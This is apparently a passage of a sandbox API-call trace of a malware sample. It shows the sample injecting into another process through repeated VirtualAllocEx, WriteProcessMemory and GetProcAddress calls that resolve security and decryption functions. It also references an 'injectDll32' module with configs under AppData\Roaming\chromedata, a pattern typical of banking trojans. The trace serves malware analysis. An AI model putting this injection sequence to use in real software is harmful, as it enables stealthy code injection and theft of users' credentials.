	[0188.265] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.265] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552b0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.265] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.265] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.265] lstrlenA (lpString="AcquireCredentialsHandleA") returned 25
	[0188.265] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.266] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7166*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7166*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0188.266] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.266] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.266] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.266] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.267] ResetEvent (hEvent=0x478) returned 1
	[0188.267] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.267] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.267] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.267] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.267] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552b4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.268] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.268] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.268] lstrlenA (lpString="DeleteSecurityContext") returned 21
	[0188.268] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.268] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7182*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7182*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0188.268] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.268] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.269] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.269] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.269] ResetEvent (hEvent=0x478) returned 1
	[0188.269] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.269] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.270] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.270] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.270] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.270] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552b8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.270] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.270] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.270] lstrlenA (lpString="InitializeSecurityContextA") returned 26
	[0188.270] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.271] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb719a*, nSize=0x1b, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb719a*, lpNumberOfBytesWritten=0x12857c*=0x1b) returned 1
	[0188.271] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.271] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.271] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.271] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.272] ResetEvent (hEvent=0x478) returned 1
	[0188.272] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.272] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.272] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.272] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.272] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.272] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552bc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.273] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.273] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.273] lstrlenA (lpString="DecryptMessage") returned 14
	[0188.273] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.273] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb71b8*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb71b8*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0188.273] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.274] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.274] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.274] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.274] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.274] ResetEvent (hEvent=0x478) returned 1
	[0188.274] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.275] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.275] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.275] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.275] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552c0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.275] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.275] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.276] lstrlenA (lpString="FreeContextBuffer") returned 17
	[0188.276] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.276] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb70fa*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb70fa*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0188.276] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.276] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.276] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.277] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.277] ResetEvent (hEvent=0x478) returned 1
	[0188.277] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.277] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.277] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.277] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.277] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.278] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552c4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.278] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.278] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0188.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb78ce, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0188.278] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb78ce, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=12 | out: lpWideCharStr="SHELL32.dll") returned 12
	[0188.278] lstrlenW (lpString="SHELL32.dll") returned 11
	[0188.278] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.278] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0188.279] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0188.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.279] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.279] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0188.279] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0188.280] ResetEvent (hEvent=0x478) returned 1
	[0188.280] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.290] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0188.290] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.290] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.290] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.291] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.291] lstrlenA (lpString="SHGetSpecialFolderPathA") returned 23
	[0188.291] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.291] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb78b6*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb78b6*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0188.291] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.291] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.291] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.292] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.292] ResetEvent (hEvent=0x478) returned 1
	[0188.292] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.292] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.292] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.293] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.293] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055280, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.293] lstrcmpA (lpString1="Control", lpString2="Start") returned -1
	[0188.293] lstrcmpA (lpString1="Control", lpString2="Control") returned 0
	[0188.293] lstrcmpA (lpString1="FreeBuffer", lpString2="Start") returned -1
	[0188.293] lstrcmpA (lpString1="FreeBuffer", lpString2="Control") returned 1
	[0188.293] lstrcmpA (lpString1="FreeBuffer", lpString2="FreeBuffer") returned 0
	[0188.293] lstrcmpA (lpString1="Release", lpString2="Start") returned -1
	[0188.293] lstrcmpA (lpString1="Release", lpString2="Control") returned 1
	[0188.293] lstrcmpA (lpString1="Release", lpString2="FreeBuffer") returned 1
	[0188.293] lstrcmpA (lpString1="Release", lpString2="Release") returned 0
	[0188.293] lstrcmpA (lpString1="Start", lpString2="Start") returned 0
	[0188.293] VirtualProtectEx (in: hProcess=0x47c, lpAddress=0x10001000, dwSize=0x53b75, flNewProtect=0x20, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0188.295] VirtualProtectEx (in: hProcess=0x47c, lpAddress=0x10055000, dwSize=0x1393c, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0188.295] VirtualProtectEx (in: hProcess=0x47c, lpAddress=0x10069000, dwSize=0x285a8, flNewProtect=0x4, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0188.296] VirtualProtectEx (in: hProcess=0x47c, lpAddress=0x10092000, dwSize=0x110, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0188.296] VirtualProtectEx (in: hProcess=0x47c, lpAddress=0x10093000, dwSize=0x1e0, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0188.296] VirtualProtectEx (in: hProcess=0x47c, lpAddress=0x10094000, dwSize=0x2fb8, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0188.296] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128650, nSize=0x70, lpNumberOfBytesRead=0x128630 | out: lpBuffer=0x128650*, lpNumberOfBytesRead=0x128630*=0x70) returned 1
	[0188.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.296] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.296] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x14, lpNumberOfBytesWritten=0x128628 | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x128628*=0x14) returned 1
	[0188.297] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128650*, nSize=0x70, lpNumberOfBytesWritten=0x128628 | out: lpBuffer=0x128650*, lpNumberOfBytesWritten=0x128628*=0x70) returned 1
	[0188.297] ResetEvent (hEvent=0x478) returned 1
	[0188.297] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.309] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128650, nSize=0x70, lpNumberOfBytesRead=0x128628 | out: lpBuffer=0x128650*, lpNumberOfBytesRead=0x128628*=0x70) returned 1
	[0188.309] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.309] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.309] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732590) returned 1
	[0188.310] lstrlenA (lpString="injectDll32") returned 11
	[0188.310] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.310] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad1b0*, nSize=0xc, lpNumberOfBytesWritten=0x128b6c | out: lpBuffer=0x22ad1b0*, lpNumberOfBytesWritten=0x128b6c*=0xc) returned 1
	[0188.310] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.310] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x128ef4*, nSize=0x400, lpNumberOfBytesWritten=0x128b6c | out: lpBuffer=0x128ef4*, lpNumberOfBytesWritten=0x128b6c*=0x400) returned 1
	[0188.311] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x184, flAllocationType=0x3000, flProtect=0x40) returned 0x200000
	[0188.311] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x200000, lpBuffer=0x128cf0*, nSize=0x184, lpNumberOfBytesWritten=0x128b68 | out: lpBuffer=0x128cf0*, lpNumberOfBytesWritten=0x128b68*=0x184) returned 1
	[0188.311] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ad0 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ad0*=0x70) returned 1
	[0188.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0188.311] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x40) returned 0x210000
	[0188.312] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x210000, lpBuffer=0x22a5b60*, nSize=0x28, lpNumberOfBytesWritten=0x128ac8 | out: lpBuffer=0x22a5b60*, lpNumberOfBytesWritten=0x128ac8*=0x28) returned 1
	[0188.312] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128af0*, nSize=0x70, lpNumberOfBytesWritten=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesWritten=0x128ac8*=0x70) returned 1
	[0188.312] ResetEvent (hEvent=0x478) returned 1
	[0188.312] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.526] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ac8*=0x70) returned 1
	[0188.527] VirtualFreeEx (hProcess=0x47c, lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.527] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0188.527] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x128ef4, nSize=0x400, lpNumberOfBytesRead=0x128b80 | out: lpBuffer=0x128ef4*, lpNumberOfBytesRead=0x128b80*=0x400) returned 1
	[0188.527] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.527] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0188.527] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0188.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5a264bc0, dwHighDateTime=0x1d50a6a)) 
	[0188.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5a264bc0, dwHighDateTime=0x1d50a6a)) 
	[0188.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263528
	[0188.528] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ee0) returned 1
	[0188.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6f60
	[0188.528] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0188.528] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
